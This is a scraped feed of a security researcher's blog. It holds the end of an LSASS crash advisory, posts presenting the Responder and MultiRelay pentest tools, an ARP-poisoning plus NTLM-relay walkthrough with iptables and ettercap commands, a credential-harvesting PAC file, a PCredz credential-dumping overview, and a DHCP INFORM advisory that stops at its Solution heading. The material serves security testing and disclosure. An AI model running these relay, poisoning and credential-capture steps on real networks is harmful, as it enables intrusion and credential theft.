00aafd0c 4ab860c8 00d5f900 00d5f908 00aafe40 lsasrv!WLsaAcceptContext+0x139<br />
00aafe84 4ab7ae7b 00d5f8d8 005ccaf0 00599048 lsasrv!LpcAcceptContext+0x13b<br />
00aafe9c 4ab7ad7e 00d5f8d8 4ac22738 00d5a158 lsasrv!DispatchAPI+0x46<br />
00aaff54 4ab7a7c9 00d5f8d8 00aaff9c 77e5baf1 lsasrv!LpcHandler+0x1fe<br />
00aaff78 4ab8f448 00598ce8 00000000 00000000 lsasrv!SpmPoolThreadBase+0xb9<br />
00aaffb8 77e6484f 0059ade8 00000000 00000000 lsasrv!LsapThreadBase+0x91<br />
00aaffec 00000000 4ab8f3f1 0059ade8 00000000 kernel32!BaseThreadStart+0x34<br />
<br />
dt ntdll!_RTL_CRITICAL_SECTION<br />
+0x000 DebugInfo : Ptr32 _RTL_CRITICAL_SECTION_DEBUG<br />
+0x004 LockCount : Int4B<br />
+0x008 RecursionCount : Int4B<br />
+0x00c OwningThread : Ptr32 Void<br />
+0x010 LockSemaphore : Ptr32 Void<br />
+0x014 SpinCount : Uint4B<br />
<br />
- LSASS NegpBuildMechListFromCreds sends a null pointer "creds" to NTDLL RtlEnterCriticalSection.<br />
- RtlEnterCriticalSection is used with a null pointer, which triggers the crash.<br />
<br />
Impact<br />
------<br />
<br />
Successful attempts will result in a remote system crash and possibly local privilege escalation.<br />
<br />
Affected products<br />
-----------------<br />
<br />
Windows:<br />
- XP<br />
- Server 2003<br />
- 7<br />
- 8<br />
- 2008<br />
- 2012<br />
- 10<br />
<br />
Proof of concept<br />
----------------<br />
<br />
A proof of concept is available at the following URL:<br />
https://github.com/lgandx/PoC/tree/master/LSASS<br />
This proof of concept is fully automated and includes non-vulnerable detection.<br />
<br />
Solution<br />
--------<br />
<br />
Install the corresponding MS patch.<br />
More details:<br />
https://technet.microsoft.com/en-us/library/security/ms16-137.aspx<br />
<br />
Response timeline<br />
-----------------<br />
<br />
* 17/09/2016 - Vendor notified, proof of concept sent.<br />
* 28/09/2016 - Issue confirmed by MSRC<br />
* 14/10/2016 - Vendor says he plan to release a patch in November, <u><b>that is 1 month in advance of the scheduled 3 month.</b></u><br />
* 08/11/2016 - Vendor release MS16-137.<br />
* 08/11/2016 - This advisory released.<br />
<br />
References<br />
----------<br />
* https://twitter.com/PythonResponder<br />
* https://github.com/lgandx/Responder</div>
Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com12tag:blogger.com,1999:blog-3247452330105635425.post-34527479554270175202016-10-13T13:01:00.000-07:002016-10-13T14:31:13.255-07:00Introducing Responder MultiRelay 1.0<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
</div>
<h4 style="text-align: left;">
MultiRelay Description:</h4>
<div style="text-align: left;">
<a href="https://github.com/lgandx/Responder" target="_blank">MultiRelay</a> is a powerful pentest utility included in Responder's tools folder, giving you the ability to perform targeted NTLMv1 and NTLMv2 relay on a selected target.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Currently MultiRelay relays HTTP, WebDav, Proxy and SMB authentications to an SMB server. </div>
<div style="text-align: left;">
This tool can be customized to accept a range of users to relay to a target. The concept behind this is to only target domain Administrators, local Administrators, or privileged accounts.<br />
<br />
Once a relay has been successful, MultiRelay will give you an interactive shell allowing you to:</div>
<ul style="text-align: left;">
<li> Remotely dump the LM and NT hashes on the target.</li>
</ul>
<ul style="text-align: left;">
<li>Remotely dump any registry keys under HKLM.</li>
</ul>
<ul style="text-align: left;">
<li>Read any file on the target.</li>
</ul>
<ul style="text-align: left;">
<li>Download any file on the target.</li>
</ul>
<ul style="text-align: left;">
<li>Execute any command as System on the target.</li>
</ul>
<div style="text-align: left;">
<br /></div>
<h4 style="text-align: left;">
Usage Overview:</h4>
<div style="text-align: left;">
Most of the time, MultiRelay can be run with the following options:</div>
<ul style="text-align: left;">
<li>./tools/MultiRelay.py -t Target_IP -u Administrator DAaccount AnotherAdmin</li>
</ul>
<div style="text-align: left;">
<br />
MultiRelay comes with a set of 3 options:</div>
<ul style="text-align: left;">
<li>-p: Add an extra listening port for HTTP, WebDav, Proxy requests to relay. </li>
</ul>
<ul style="text-align: left;">
<li>-u: A list of users to relay. -u can also be set to "ALL" to target all users.</li>
</ul>
<ul style="text-align: left;">
<li>-t: The target</li>
</ul>
<div style="text-align: left;">
<br />
MultiRelay will start by fingerprinting your target and tell you if SMB Signing is mandatory and if so, will let you know that you should target another server.<br />
<br />
Another useful utility included in Responder's tools folder is RunFinger.py. RunFinger accepts a single IP address or a class C range and will tell you the following for a given target:</div>
<ul style="text-align: left;">
<li>Os version</li>
</ul>
<ul style="text-align: left;">
<li>Domain joined</li>
</ul>
<ul style="text-align: left;">
<li>Signing is mandatory or not.</li>
</ul>
<div style="text-align: left;">
<br />
RunFinger can dump this information in a grepable format by using the -g command line switch:<br />
root@lgandx:~/Responder-2.3.3.0# ./tools/RunFinger.py -g -i 10.10.20.0/24<br />
Wich will output something like:<br />
...<br />
[10.10.20.41: 'Windows Server 2012 Standard 9200', domain: 'CORP', signing:'False']<br />
[10.10.20.36: 'Windows Server 2012 R2 Standard 9600', domain: 'CORP', signing:'False']<br />
[10.10.20.22: 'Windows Server 2012 Standard 9200', domain: 'CORP', signing:'False']<br />
[10.10.20.43: 'Windows Server 2012 Standard 9200', domain: 'CORP', signing:'False']<br />
[10.10.20.49: 'Windows Server 2012 R2 Standard 9600', domain: 'CORP', signing:'True']<br />
[10.10.20.35: 'Windows Server 2012 R2 Standard 9600', domain: 'CORP', signing:'False']<br />
[10.10.20.40: 'Windows Server 2012 Standard 9200', domain: 'CORP', signing:'False']<br />
....<br />
This utility is useful for mapping networks and to carefully select a target.</div>
<h4 style="text-align: left;">
Running The Tool, The Common Scenario:</h4>
<div style="text-align: left;">
MultiRelay was built to work in conjunction with Responder.py, the common usage scenario is:</div>
<ul style="text-align: left;">
<li>Set SMB and HTTP to Off in Responder.conf</li>
</ul>
<ul style="text-align: left;">
<li>./Responder.py -I eth0 -rv on one screen</li>
</ul>
<ul style="text-align: left;">
<li>./tools/MultiRelay.py -t Target_IP -u Administrator DAaccount OtherAdmin on another one.</li>
</ul>
<div style="text-align: left;">
<br />
In this scenario all NBT-NS, LLMNR lookups will be resolved with Responder.py to our IP address, MultiRelay will be listening on TCP port 80, 3128, 445 and will be waiting for incoming connections.<br />
<br />
Once a connection is received, MultiRelay will be parsing all authentication requests and will verify if:</div>
<ul style="text-align: left;">
<li>The user authentication is allowed to be relayed on the target.</li>
</ul>
<ul style="text-align: left;">
<li>This user has already been relayed to our target and if the server returned a logon failure.</li>
</ul>
<div style="text-align: left;">
<br />
If this user was previously relayed and the server returned a logon failure, this user will be blacklisted for further authentication.</div>
<div style="text-align: left;">
<br />
This is done to prevent account lockouts. This check can be reset by deleting the SMBRelay-Session.txt file in Responder logs folder.<br />
<br />
Even if a user is not allowed to be relayed, his NTLMv1/v2 sets of credentials will be captured and stored in Responder logs folder as "SMB-Relay-CLIENTIP.txt", so you won't lose any hashes while running MultiRelay.py</div>
<h4 style="text-align: left;">
The LLMNR/NBT-NS Disabled Scenario:</h4>
<div style="text-align: left;">
<br />
MultiRelay can also be easily used in combination with ARP poisoning attacks, in this scenario let's assume:</div>
<ul style="text-align: left;">
<li>Switch IP: 10.10.10.254</li>
</ul>
<ul style="text-align: left;">
<li>File server: 10.10.10.20</li>
</ul>
<ul style="text-align: left;">
<li> Backup file server (target): 10.10.10.24</li>
</ul>
<ul style="text-align: left;">
<li> Our IP: 10.10.10.201</li>
</ul>
<div style="text-align: left;">
<br />
After some reconnaissance, we know for fact that once in a while the target is syncing with the File sharing server using its Administrator account.<br />
We can therefore setup the following targeted ARP poisoning attack:<br />
<br />
Lets enable IP forwarding.</div>
<ul style="text-align: left;">
<li> echo 1 > /proc/sys/net/ipv4/ip_forward</li>
</ul>
<div style="text-align: left;">
<br />
We will be dropping all outgoing ICMP. This prevents the kernel sending port/host unreachable to our target.</div>
<ul style="text-align: left;">
<li> iptables -A OUTPUT -p ICMP -j DROP</li>
</ul>
<div style="text-align: left;">
<br />
Since all packets will be going through our box, let's rewrite the destination address and port on the fly for all SMB requests destinated to 10.10.10.20:445 to our IP 10.10.10.201:445.</div>
<ul style="text-align: left;">
<li>iptables -t nat -A PREROUTING -p tcp --dst 10.10.10.20 --dport 445 -j DNAT --to-destination 10.10.10.201:445</li>
</ul>
<div style="text-align: left;">
Launch MultiRelay:</div>
<ul style="text-align: left;">
<li>./tools/MultiRelay.py -t10.10.10.20 -U Administrator</li>
</ul>
<div style="text-align: left;">
<br />
And finally, launch the actual attack, we only target the backup fileshare:</div>
<ul style="text-align: left;">
<li>ettercap -T -q -w AttackDump-01.pcap -p -M arp:remote /10.10.10.254// /10.10.10.24//</li>
</ul>
<h4 style="text-align: left;">
MultiRelay Functionalities:</h4>
<div style="text-align: left;">
Once a relay has been successfull, MultiRelay will let you:</div>
<ul style="text-align: left;">
<li> Dump registry key and subkeys remotely.</li>
</ul>
<div style="text-align: left;">
This is done by making a DCE/RPC call to the Windows Remote Registry pipe, saving the key on the SMB server and finally making a read request to the selected saved key.</div>
<ul style="text-align: left;">
<li> Dump the SAM database remotely.</li>
</ul>
<div style="text-align: left;">
This is done by extracting the bootkey and saving the SAM key locally. Responder includes a version of creddump which will parse and output the hashes.</div>
<ul style="text-align: left;">
<li> Read a file on the target SMB server.</li>
</ul>
<div style="text-align: left;">
Simple SMB read request on a given file.</div>
<ul style="text-align: left;">
<li> Download a file from the SMB server.</li>
</ul>
<div style="text-align: left;">
Same as read file, but we save the output locally.</div>
<ul style="text-align: left;">
<li> Execute a command as system on the server.</li>
</ul>
<div style="text-align: left;">
This one is done by making a DCE/RPC call to the Windows Services Control Manager and remotely creating a service which will run this command:</div>
<ul style="text-align: left;">
<li>cmd.exe /C echo del /F /Q Filename.bat ^&^User defined command goes here^>Windows\Temp\Results.txt >Filename.bat& cmd.exe /C call Filename.bat&exit</li>
</ul>
<div style="text-align: left;">
That is:</div>
<ol style="text-align: left;">
<li> echo "del /F /Q Filename.bat ^&^User defined command goes here^>Windows\Temp\Results.txt" into Filename.bat</li>
<li> run Filename.bat and exit.</li>
</ol>
<div style="text-align: left;">
We then make a SMB read request on Results.txt, and we print the output to the user console.<br />
<br />
Download link: <a href="https://github.com/lgandx/Responder">https://github.com/lgandx/Responder</a> </div>
<h4 style="text-align: left;">
Thanks:</h4>
<div style="text-align: left;">
</div>
<ul style="text-align: left;">
<li>DiabloHorn <a href="https://diablohorn.com/2013/10/24/remote-hash-dumping-no-processes-or-tool-upload-needed/">https://diablohorn.com/2013/10/24/remote-hash-dumping-no-processes-or-tool-upload-needed/</a></li>
</ul>
<ul style="text-align: left;">
<li>Alberto Solino (<a href="https://twitter.com/agsolino" target="_blank">@agsolino</a>) smbrelayx and Impacket: <a href="https://github.com/CoreSecurity/impacket">https://github.com/CoreSecurity/impacket</a></li>
</ul>
<ul style="text-align: left;">
<li>Brendan Dolan-Gavitt (<a href="https://twitter.com/moyix" target="_blank">@moyix</a>): <a href="http://moyix.blogspot.com/2008/02/creddump-extract-credentials-from.html">http://moyix.blogspot.com/2008/02/creddump-extract-credentials-from.html</a> and <a href="https://github.com/moyix/creddump">https://github.com/moyix/creddump</a></li>
</ul>
<br /></div>
Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com10tag:blogger.com,1999:blog-3247452330105635425.post-52956508974188742742016-09-26T16:57:00.000-07:002016-10-15T15:17:42.117-07:00Status of Submitted Vulnerabilities To MSRC<div dir="ltr" style="text-align: left;" trbidi="on">
This list is intended to give vague information about submitted bugs, but important information about communication process and timeline.<br />
<h4 style="text-align: left;">
Bug Title: Microsoft <span class="_Tgc">Local Security Authority Subsystem Service (<b>LSASS</b>)</span> Remote Memory Corruption.</h4>
<ul style="text-align: left;">
<li>Affected software: Microsoft <span class="_Tgc">Local Security Authority Subsystem Service (LSASS)</span></li>
<li>Type: Memory Corruption.</li>
<li>Submitted: 15/09/2016</li>
<li>Coordinated disclosure agreement expiration: 15/12/2016.</li>
<li>Notes and updates: <br />-Proof of concept code was sent on 17/09/2016, no confirmations or real updates were received since then.<br />- 28/09/2016: Issue confirmed by MSRC, they are planning on releasing a patch on each affected platform.<br />- MSRC informed the bug submitter that they are planning to release a patch on November 8, 2016, <u>that is a full month in advance of the 3 months deadline.</u> </li>
</ul>
<h4 style="text-align: left;">
Bug Title: SMBv2 Remote Memory Corruption.</h4>
<ul style="text-align: left;">
<li>Affected software: Microsoft SMBv2.</li>
<li>Type: Memory Corruption.</li>
<li>Submitted: 25/09/2016. </li>
<li>Coordinated disclosure agreement expiration: 25/12/2016.</li>
<li>Notes and updates: <br />- MSRC is currently investigating the issue.<br />- Microsoft confirmed the issue on 28/09/2016. <br />- Bug submitter extended his coordinated disclosure agreement to 1 more month, due to certain circumstances around this issue.</li>
</ul>
<h4 style="text-align: left;">
Bug Title: Microsoft Active Directory PDC Remote Code Execution.</h4>
<ul style="text-align: left;">
<li>Affected software: Microsoft Active Directory</li>
<li>Type: Protocol Abuse</li>
<li>Submitted: 09/12/2016</li>
<li>Bug status: Implemented in Responder v2.3.2.2</li>
<li>Notes and updates: <br />- Proof of concept code was sent on 12/09/2016, Microsoft is planning to release a security fix "over the next few months".<br />- Additional proof of concept provided on 02/10/2016 leading to privilege escalation.</li>
</ul>
</div>
Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com1tag:blogger.com,1999:blog-3247452330105635425.post-57334083920490199012016-09-26T14:27:00.000-07:002016-09-27T05:20:30.912-07:00Reporting Vulnerability Policy<div dir="ltr" style="text-align: left;" trbidi="on">
After several years of actively reporting security bugs to various vendors I came to the following conclusion:<br />
<ul style="text-align: left;">
<li>A vendor will usually sit on a critical bug as long as he can. Response teams like MSRC, are particularly good at it. I've seen cases where a critical RCE took more than a year before a patch came out.</li>
</ul>
<ul style="text-align: left;">
<li>While they usually pretend to care about end-users, most of the time a security patch is released when timing is opportunistic. For example, Server side bugs (RDP, AD/SMB, Lync) month is usually June at MSRC:</li>
</ul>
<ol style="text-align: left;">
<li><a href="https://technet.microsoft.com/en-us/library/security/ms16-jun.aspx">https://technet.microsoft.com/en-us/library/security/ms16-jun.aspx</a></li>
<li><a href="https://technet.microsoft.com/en-us/library/security/ms15-jun.aspx">https://technet.microsoft.com/en-us/library/security/ms15-jun.aspx</a></li>
<li><a href="https://technet.microsoft.com/en-us/library/security/ms14-jun.aspx">https://technet.microsoft.com/en-us/library/security/ms14-jun.aspx</a></li>
<li><a href="https://technet.microsoft.com/en-us/library/security/ms13-jun.aspx">https://technet.microsoft.com/en-us/library/security/ms13-jun.aspx</a></li>
<li><a href="https://technet.microsoft.com/en-us/library/security/ms12-jun.aspx">https://technet.microsoft.com/en-us/library/security/ms12-jun.aspx</a></li>
<li><a href="https://technet.microsoft.com/en-us/library/security/ms11-jun.aspx">https://technet.microsoft.com/en-us/library/security/ms11-jun.aspx</a></li>
</ol>
<ul style="text-align: left;">
<li>We only see how long a vendor took to fix a vulnerability when there's an actual advisory with a timeline. Usually the average time is 7-9 months. </li>
</ul>
<ul style="text-align: left;">
<li>Taking even 6 months to fix a simple length check is simply not acceptable. It doesn't show in any way a commitment for the security of their users.</li>
</ul>
Although I must say that I had the opportunity to work with productive vendors in the past for the same kind of bugs I submitted to MSRC. For example, with Samba's Security team, a technical answer was usually sent within 2 hours after submitting a security bug and was fixed across all their branches within 1 week at most.<br />
<br />
After some constructive discussions with MSRC lately I decided that I don't want to somehow contribute to this scheme and that things need to change.<br />
<br />
Starting today, vulnerabilities already submitted to MSRC <a href="https://g-laurent.blogspot.com/2016/09/status-of-submitted-vulnerabilities-to.html" target="_blank">will be announced publicly</a> (vuln title, criticity, vuln type) on this blog, but no technical details will be provided to the general public until a patch is out or until my vulnerability disclosure policy agreement has been breached (taking more than x months, for example). Users will be able to track the time it takes them to patch a critical issue and will pressure them if they feel the timeline is unfair. Communities are great for that.<br />
<br />
NAC, IDS, IPS vendors might receive ready to go signature for a fairly low price on a case by case review, I don't want any of this ending in any gov's hands before a patch is out. Therefore, selected security vendors will be able to protect their users from critical 0day attacks several months before Microsoft finally decide to protect them by releasing the actual patch.<br />
<br />
I invite any frequent MSRC submitter to join me, if they feel like MSFT or any other high profile vendor is sitting on their bugs, it can also be hosted here or published in the same way on their websites.<br />
<br />
Users win, you win, I win.<br />
<br />
GPG public key: AD0D 60A7 FDAE 1443 F439 D6B1 8DA2 BA12 402E 6A77 </div>
Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com0tag:blogger.com,1999:blog-3247452330105635425.post-18877033016912154982016-09-11T20:27:00.001-07:002016-09-12T05:07:58.256-07:00 Introducing Proxy Auth on Responder 2.3.2<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
Few days ago <a href="https://twitter.com/mubix" target="_blank">mubix</a> submitted a <a href="https://github.com/lgandx/Responder/issues/1" target="_blank">feature request </a>on <a href="https://github.com/lgandx/Responder/" target="_blank">Responder repository</a>. </div>
I liked the idea and I started working on it. The concept was to force authentication while a victim would use the WPAD proxy server, but then comes the question: Why would you auth someone on the proxy while you used the option -F to force authentication for wpad.dat file retrieval?<br />
<br />
Why not letting anyone get that wpad.dat configuration file for free, no authentication and then use another proxy server (not the wpad server) to force authentication, so Responder doesn't send an HTTP 401 response, but a 407 Proxy Authentication Required and then ditch the connection.<br />
<br />
<div style="text-align: left;">
Thanks to PAC files, you can set fail-over proxy servers:</div>
<div style="text-align: left;">
<br /></div>
function FindProxyForURL(url, host)<br />
{<br />
if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) <span style="background-color: yellow;"></span><br />
return "DIRECT"; <br />
<br />
if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) <br />
return "DIRECT";<br />
<br />
return 'PROXY 10.10.100.10:3128; PROXY 10.10.100.20:3141; DIRECT';<br />
}<br />
<br />
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<div style="text-align: left;">
<b>The last line means: </b></div>
<br />
If the proxy server 10.10.100.10:3128 fails, then use this one: 10.10.100.20:3141 and if both fails, use a direct connection to the intranet or internet.<br />
<br />
Using this functionality, we can make sure the WPAD server is not working -by not using the -w option- then any workstation using our PAC file will:</div>
<ul style="text-align: left;">
<li>Connect to 10.10.100.10:3128 and send a request with URL, cookies, headers.</li>
</ul>
<ul style="text-align: left;">
<li>The Auth-Proxy module will respond with a 407 and request credentials.<br /> </li>
<li>The workstation will transparently send its encrypted NTLMv1/NTLMv2 credentials and will get a TCP Reset from the proxy server right after that. <br /> </li>
<li>This is done by using SO_LINGER which will send a RST as soon as close() is called, faking a proxy server failure.</li>
</ul>
<ul style="text-align: left;">
<li>The workstation will then attempt the second proxy server 10.10.100.20:3141 which is offline.</li>
</ul>
<ul style="text-align: left;">
<li>Finally the workstation will connect to the internet directly.</li>
</ul>
<br />
The user behind his desk using Internet Explorer has seen nothing and has internet access, we get his NTLM credentials.<br />
<br />
This attack is highly effective and is included in the latest version 2.3.2:<br />
<br />
https://github.com/lgandx/Responder/<br />
<br />
This video demonstrates the concept on a 2012R2 PDC with default settings, someone simply open IE, Responder gets the credentials transparently, no password prompt:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe width="320" height="266" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/mgAHX4h1ojI/0.jpg" src="https://www.youtube.com/embed/mgAHX4h1ojI?feature=player_embedded" frameborder="0" allowfullscreen></iframe></div>
<br /> </div>
Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com1tag:blogger.com,1999:blog-3247452330105635425.post-36011700184373753462015-09-30T02:57:00.001-07:002015-09-30T02:57:28.561-07:00<div dir="ltr" style="text-align: left;" trbidi="on">
<b>Demistifying Responder WPAD Authentication module:</b><br /><br />One of the most successful modules in Responder is the WPAD server.<br />
<br />The WPAD functionality can be boiled down this way, there's two issues: <br />
<ul style="text-align: left;">
<li><b>WPAD MITM:</b> Anyone on an ISP (like qc.ca) plugged direcly into the modem (WAN), and therefore on the internet, will be vulnerable if someone creates a wpad.qc.ca domain and serve a wpad.dat file to the people looking for it.</li>
</ul>
The Web Proxy Autodiscovery Protocol is looking for WPAD.domain.name by default, if there's no answer then it will fall back to Multicast LLMNR and if that fails it will go to broadcast NBT-NS.<ul>
<li><b> WPAD file retrieval: </b>Responder is exploiting the fact that in the Web Proxy Autodiscovery Protocol, HTTP authentication is allowed and supported. Therefore if a workstation is looking for "WPAD" via LLMNR or NBT-NS and someone answers it (multicast/broadcast) using a rogue HTTP authentication server, that workstation will send transparently its sets of credentials. </li>
</ul>
If a workstation boots up, the machine credentials will be sent. If a user opens up IE on that workstation, Responder will get the encrypted sets of credentials transparently, with obviously no user interaction and no logs. Therefore, no logs no crime, right?<br />What I just described is the stealthiest way of exploiting and getting encrypted sets of credentials on any workstations ranging from Windows 2000 to 2012R2.</div>
Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com0tag:blogger.com,1999:blog-3247452330105635425.post-58556253824703779372014-06-09T22:38:00.001-07:002014-06-09T22:38:40.656-07:00Responder v2.0.9<div dir="ltr" style="text-align: left;" trbidi="on">
Responder is an Active Directory/Windows environment takeover tool suite that can stealthily take over any default active directory environment (including Windows 2012) in minutes or hours. Most of the attacks in this tool are hard to detect and are highly successful.<br /><br />Responder attacks 5 Windows core protocols:<br /> - LLMNR Poisoning (Windows >=vista).<br /> - Netbios Name Service Poisoning (NBT-NS poisoning, any by default).<br /> - WPAD (Any by default).<br /> - ICMP Redirect (Windows <=2003/XP).<br /> - DHCP INFORM (Windows <=2003/XP) and ability to perform normal DHCP attacks (Linux, OSX, Windows) [unicast answer].<br /><br />An extra protocol has been added, for OSX and Linux distributions using avahi: MDNS (Linux, Apple, any .local)<br /><br />When exploiting these protocol flaws, Responder has its own rogue servers listening:<br />- SMB Auth server. Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2012 RC, Samba and Mac OSX Lion. Clear text password is supported for NT4, and LM hashing downgrade when the --lm option is set. This functionality is enabled by default when the tool is launched.<br /><br />- MSSQL Auth server. In order to redirect SQL Authentication to this tool, you will need to set the option -r (NBT-NS queries for SQL Server lookup are using the Workstation Service name suffix) for systems older than windows Vista (LLMNR will be used for Vista and higher). This server supports NTLMv1, LMv2 hashes. This functionality was successfully tested on Windows SQL Server 2005 & 2008.<br /><br />- HTTP Auth server. In order to redirect HTTP Authentication to this tool, you will need to set the option -r for Windows versions older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMv1, NTLMv2 hashes and Basic Authentication. This server was successfully tested on IE 6 to IE 10, Firefox, Chrome, Safari. Note: This module also works for WebDav NTLM authentication issued from Windows WebDav clients (WebClient). You can also send your custom files to a victim.<br /><br />- HTTPS Auth server. In order to redirect HTTPS Authentication to this tool, you will need to set the -r option for Windows versions older than Vista (NBT-NS queries for HTTP server lookups are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMv1, NTLMv2, and Basic Authentication. This server was successfully tested on IE 6 to IE 10, Firefox, Chrome, and Safari. The folder Cert/ was added. It containa 2 default keys, including a dummy private key. This is intentional. The purpose is to have Responder working out of the box. A script was added in case you need to generate your own self signed key pair.<br /><br />- LDAP Auth server. In order to redirect LDAP Authentication to this tool, you will need to set the option -r for Windows versions older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMSSP hashes and Simple Authentication (clear text authentication). This server was successfully tested on Windows Support tool "ldp" and LdapAdmin.<br /><br />- FTP Auth server. This module will collect FTP clear text credentials.<br /><br />- Kerberos v5 pre-auth server.<br /><br />- Small DNS server. This server will answer type A queries. This is really handy when it's combined with ARP spoofing, ICMP Redirect, DHCP INFORM.<br /><br />- WPAD rogue transparent proxy server. This module will capture all HTTP requests from anyone launching Internet Explorer on the network. This module is highly effective. You can send your custom PAC script to a victim and inject HTML into the server's responses. See Responder.conf.<br /><br />- Analyze mode: This module allows you to see NBT-NS, BROWSER and LLMNR requests between systems without poisoning any requests. You can also map domains, MSSQL servers, workstations passively and also see if ICMP Redirects attacks are plausible on your subnet. No port scans.<br /><br />- POP3 auth server. This module will collect POP3 plaintext credentials<br /><br />- SMTP auth server. This module will collect PLAIN/LOGIN clear text credentials.<br /><br />- IMAP auth server.<br />
<br />
Responder also lets you:<br /><br />- Customizes your penetration test via Responder.conf.<br />- Responds to specific in-scope Netbios/LLMNR names.<br />- Responds to specific in-scope ip addresses.<br />- Injects SMB share pictures into WPAD responses.<br />- Replaces requested .exe files with your own, but shown as the original one requested.<br />- Replaces any requested page with your custom html page, exe file, etc (S-E).<br />- Set you custom NETNTLM Challenge.<br /><br />- Logs all its activity to a file: Responder-Session.log.<br />- All hashes are printed to stdout and dumped in an unique hashcat compliant file using this format: (SMB or MSSQL or HTTP)-(ntlm-v1 or v2 or clear-text)-Client_IP.txt. The file will be located in the current folder.<br />- When the option -f is set, Responder will fingerprint every host that issued an LLMNR/NBT-NS query. All capture modules still work while in fingerprint mode.<br /><br />Usage example:<br />./Responder.py -i Your_IP_Address -rvF<br />MUse NBT-NS workstation redirects, be verbose, force WPAD file retrieval authentication<br /><br />./Responder.py -i Your_IP_Address -A<br />Analyze mode shows NBT-NS/LLMNR/MDNS queries without responding and finds all MSSQL servers, Workstations, Domains, prints if you can ICMP-Redirect on the subnet. Passive reconnaissance at its best. No port scan, map a network within minutes.<br /><br />Github:<br />https://github.com/Spiderlabs/Responder<br /><br />More info:<br />- https://github.com/SpiderLabs/Responder/blob/master/README.md<br />- http://blog.spiderlabs.com/2012/10/introducing-responder-10.html <br />- http://blog.spiderlabs.com/2013/01/owning-windows-networks-with-responder-17.html <br />- http://blog.spiderlabs.com/2013/02/owning-windows-network-with-responder-part-2.html <br />- http://blog.spiderlabs.com/2014/02/responder-20-owning-windows-networks-part-3.html<br /><br />Twitter: <br />- https://twitter.com/PythonResponder</div>
Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com0tag:blogger.com,1999:blog-3247452330105635425.post-80144746424381892022014-06-07T19:52:00.001-07:002014-06-07T20:00:42.926-07:00More on PCredz..<div dir="ltr" style="text-align: left;" trbidi="on">
Pcredz was designed to dump useful information on the fly, from a pcap file or from a pcap directory.<br />
Unlike tools like, for example Breachprobe, Pcredz is highly effective and fast just to meet your pentest needs. <br />
<br />
What Pcredz does right now from a live interface or pcap file: <br />
<ul>
<li>Identify Card Holder Data (CHD) on any port.</li>
<li>Dump NTLMv1/v2 (DCE-RPC,SMBv1/2,LDAP,MSSQL,<wbr></wbr>HTTP,etc) hashes on any protocol and port.</li>
<li>Dump Kerberos (AS-REQ Pre-Auth etype 23) hashes (TCP/UDP 88).</li>
<li>Dump HTTP Basic (any port).</li>
<li>Dump POP credentials.</li>
<li>Dump SMTP credentials.</li>
<li>Dump IMAP credentials.</li>
<li>Dump SNMP community strings.</li>
<li>Dump FTP credentials.</li>
</ul>
All hashes are displayed in hashcat format (use -m 7500 for kerberos, -m 5500 for NTLMv1, -m 5600 for NTLMv2).<br />All credentials are logged to a file (CredentialDump-Session.log).<br />
<br />
Pcredz was designed to be highly efficient, specifically with ARP poisoning attacks.<br />
More details and download link:<br />Github: <a href="https://github.com/lgandx/PCredz/" target="_blank">https://github.com/lgandx/<wbr></wbr>PCredz/</a></div>
Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com0tag:blogger.com,1999:blog-3247452330105635425.post-46676568401466186022014-05-28T17:16:00.001-07:002014-05-28T18:20:39.009-07:00Microsoft DHCP INFORM Configuration Overwrite<div dir="ltr" style="text-align: left;" trbidi="on">
Title: Microsoft DHCP INFORM Configuration Overwrite<br />
Version: 1.0<br />
Issue type: Protocol Security Flaw<br />
Affected vendor: Microsoft<br />
Release date: 28/05/2014<br />
Discovered by: Laurent Gaffié<br />
Advisory by: Laurent Gaffié<br />
Issue status: Patch not available<br />
==============================<br />
<div dir="ltr">
==============================<wbr></wbr>===================<br />
<br />
Summary<br />
-------<br />
<br />
A vulnerability in Windows DHCP (<a href="http://www.ietf.org/rfc/rfc2131.txt" target="_blank">http://www.ietf.org/rfc/<wbr></wbr>rfc2131.txt</a>) was found on Windows OS versions<br />
ranging from Windows 2000 through to Windows server 2003. This vulnerability allows an attacker to remotely<br />
overwrite DNS, Gateway, IP Addresses, routing, WINS server, WPAD, and server configuration with no user<br />
interaction. Successful exploitation of this issue will result in a remote network configuration<br />
overwrite. Microsoft acknowledged the issue but has indicated no plans to publish a patch to resolve it.<br />
<br />
<br />
Technical details<br />
-----------------<br />
<br />
Windows
2003/XP machines are sending periodic DHCP INFORM requests and are not
checking if the DHCP INFORM answer (DHCP ACK) is from the registered
DHCP server/relay-server. Any local system may respond to these requests
and overwrite a Windows 2003/XP network configuration by sending a
properly formatted unicast reply.<br />
<br />
Impact<br />
------<br />
<br />
Successful attempts will overwrite DNS, WPAD, WINS, gateway, and/or routing settings on the target system.<br />
<br />
Affected products<br />
-----------------<br />
<br />
Windows:<br />
- 2000<br />
- XP<br />
- 2003<br />
<br />
Proof of concept<br />
----------------<br />
The DHCP.py utility found within the Responder toolkit can be used to exploit this vulnerability.<br />
<br />
git clone <a href="https://github.com/Spiderlabs/Responder" target="_blank">https://github.com/Spiderlabs/<wbr></wbr>Responder</a><br />
<br />
Solution<br />
